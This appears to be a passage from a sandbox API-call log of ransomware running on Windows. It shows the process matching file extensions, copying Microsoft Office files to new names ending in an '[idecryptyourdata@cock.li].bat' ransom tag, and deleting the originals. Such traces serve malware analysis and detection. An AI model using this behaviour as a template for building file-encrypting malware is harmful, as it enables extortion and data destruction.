lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString=".docx") returned 5 [0057.957] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0057.957] lstrlenW (lpString=".pdf") returned 4 [0057.957] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString=".xls") returned 4 [0057.957] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString=".xlsx") returned 5 [0057.957] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0057.957] lstrlenW (lpString=".ppt") returned 4 [0057.957] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.957] lstrlenW (lpString=".zip") returned 4 [0057.957] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0057.957] lstrlenW (lpString=".rar") returned 4 [0057.957] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString=".bz2") returned 4 [0057.957] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString=".7z") returned 3 [0057.957] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.957] lstrlenW (lpString=".dbf") returned 4 [0057.957] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.958] lstrlenW (lpString=".1cd") returned 4 [0057.958] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.958] lstrlenW (lpString=".jpg") returned 4 [0057.958] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0057.958] lstrcmpiW (lpString1=".XML", lpString2=".bat") returned 1 [0057.958] lstrlenW (lpString="SLERROR.XML") returned 11 [0057.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0057.959] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=36336) returned 1 [0057.960] CloseHandle (hObject=0x350) returned 1 [0057.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 0x20 [0057.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0057.960] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.960] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0057.961] GetLastError () returned 0x0 [0057.961] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x8df0, lpOverlapped=0x0) returned 1 [0057.986] WriteFile (in: hFile=0x348, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x8e00, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x8e00, lpOverlapped=0x0) returned 1 [0057.987] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.987] WriteFile (in: hFile=0x348, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xea, lpOverlapped=0x0) returned 1 [0057.987] SetEndOfFile (hFile=0x348) returned 1 [0057.987] CloseHandle (hObject=0x348) returned 1 [0057.988] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.988] SetEndOfFile (hFile=0x350) returned 1 [0057.989] CloseHandle (hObject=0x350) returned 1 [0057.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 1 [0057.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.990] lstrlenW (lpString=".doc") returned 4 [0057.990] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0057.990] lstrlenW (lpString=".docx") returned 5 [0057.990] lstrcmpiW (lpString1=".docx", lpString2="R.XML") returned -1 [0057.990] lstrlenW (lpString=".pdf") returned 4 [0057.990] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0057.990] lstrlenW (lpString=".xls") returned 4 [0057.990] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString=".xlsx") returned 5 [0057.991] lstrcmpiW (lpString1=".xlsx", lpString2="R.XML") returned -1 [0057.991] lstrlenW (lpString=".ppt") returned 4 [0057.991] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.991] lstrlenW (lpString=".zip") returned 4 [0057.991] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0057.991] lstrlenW (lpString=".rar") returned 4 [0057.991] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString=".bz2") returned 4 [0057.991] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString=".7z") returned 3 [0057.991] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.991] lstrlenW (lpString=".dbf") returned 4 [0057.991] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.991] lstrlenW (lpString=".1cd") returned 4 [0057.991] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.991] lstrlenW (lpString=".jpg") returned 4 [0057.991] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.991] lstrlenW (lpString=".doc") returned 4 [0057.991] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0057.991] lstrlenW (lpString=".docx") returned 5 [0057.991] lstrcmpiW (lpString1=".docx", lpString2="R.XML") returned -1 [0057.991] lstrlenW (lpString=".pdf") returned 4 [0057.992] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString=".xls") returned 4 [0057.992] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString=".xlsx") returned 5 [0057.992] lstrcmpiW (lpString1=".xlsx", lpString2="R.XML") returned -1 [0057.992] lstrlenW (lpString=".ppt") returned 4 [0057.992] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.992] lstrlenW (lpString=".zip") returned 4 [0057.992] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0057.992] lstrlenW (lpString=".rar") returned 4 [0057.992] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString=".bz2") returned 4 [0057.992] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString=".7z") returned 3 [0057.992] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0057.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.992] lstrlenW (lpString=".dbf") returned 4 [0057.992] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.992] lstrlenW (lpString=".1cd") returned 4 [0057.992] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0057.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0057.992] lstrlenW (lpString=".jpg") returned 4 [0057.992] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0057.992] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0057.993] lstrlenW (lpString="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 53 [0057.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0057.994] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=387356) returned 1 [0057.994] CloseHandle (hObject=0x350) returned 1 [0057.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 0x220 [0057.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0057.994] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.994] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0057.995] GetLastError () returned 0x0 [0057.995] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x5e91c, lpOverlapped=0x0) returned 1 [0058.204] WriteFile (in: hFile=0x348, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x5e920, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x5e920, lpOverlapped=0x0) returned 1 [0058.211] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.211] WriteFile (in: hFile=0x348, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.212] SetEndOfFile (hFile=0x348) returned 1 [0058.212] CloseHandle (hObject=0x348) returned 1 [0058.220] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.220] SetEndOfFile (hFile=0x350) returned 1 [0058.224] CloseHandle (hObject=0x350) returned 1 [0058.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.225] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 1 [0058.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.225] lstrlenW (lpString=".doc") returned 4 [0058.225] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.225] lstrlenW (lpString=".docx") returned 5 [0058.226] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.226] lstrlenW (lpString=".pdf") returned 4 [0058.226] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString=".xls") returned 4 [0058.226] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString=".xlsx") returned 5 [0058.226] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.226] lstrlenW (lpString=".ppt") returned 4 [0058.226] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.226] lstrlenW (lpString=".zip") returned 4 [0058.226] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.226] lstrlenW (lpString=".rar") returned 4 [0058.226] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString=".bz2") returned 4 [0058.226] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString=".7z") returned 3 [0058.226] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.226] lstrlenW (lpString=".dbf") returned 4 [0058.226] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.226] lstrlenW (lpString=".1cd") returned 4 [0058.226] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.226] lstrlenW (lpString=".jpg") returned 4 [0058.226] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.227] lstrlenW (lpString=".doc") returned 4 [0058.227] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString=".docx") returned 5 [0058.227] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.227] lstrlenW (lpString=".pdf") returned 4 [0058.227] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString=".xls") returned 4 [0058.227] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString=".xlsx") returned 5 [0058.227] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.227] lstrlenW (lpString=".ppt") returned 4 [0058.227] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.227] lstrlenW (lpString=".zip") returned 4 [0058.227] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.227] lstrlenW (lpString=".rar") returned 4 [0058.227] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString=".bz2") returned 4 [0058.227] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString=".7z") returned 3 [0058.227] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.227] lstrlenW (lpString=".dbf") returned 4 [0058.227] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.227] lstrlenW (lpString=".1cd") returned 4 [0058.227] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0058.228] lstrlenW (lpString=".jpg") returned 4 [0058.228] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.228] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.228] lstrlenW (lpString="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 53 [0058.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.284] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=496513) returned 1 [0058.284] CloseHandle (hObject=0x370) returned 1 [0058.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 0x220 [0058.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.284] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.285] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0058.285] GetLastError () returned 0x0 [0058.285] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x79381, lpOverlapped=0x0) returned 1 [0058.339] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x79390, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x79390, lpOverlapped=0x0) returned 1 [0058.348] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.348] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.348] SetEndOfFile (hFile=0x350) returned 1 [0058.348] CloseHandle (hObject=0x350) returned 1 [0058.358] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.358] SetEndOfFile (hFile=0x370) returned 1 [0058.361] CloseHandle (hObject=0x370) returned 1 [0058.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.362] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 1 [0058.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.362] lstrlenW (lpString=".doc") returned 4 [0058.362] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.362] lstrlenW (lpString=".docx") returned 5 [0058.362] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.362] lstrlenW (lpString=".pdf") returned 4 [0058.362] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.362] lstrlenW (lpString=".xls") returned 4 [0058.362] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.362] lstrlenW (lpString=".xlsx") returned 5 [0058.362] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.362] lstrlenW (lpString=".ppt") returned 4 [0058.362] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.363] lstrlenW (lpString=".zip") returned 4 [0058.363] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.363] lstrlenW (lpString=".rar") returned 4 [0058.363] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString=".bz2") returned 4 [0058.363] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString=".7z") returned 3 [0058.363] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.363] lstrlenW (lpString=".dbf") returned 4 [0058.363] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.363] lstrlenW (lpString=".1cd") returned 4 [0058.363] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.363] lstrlenW (lpString=".jpg") returned 4 [0058.363] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.363] lstrlenW (lpString=".doc") returned 4 [0058.363] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString=".docx") returned 5 [0058.363] lstrcmpiW 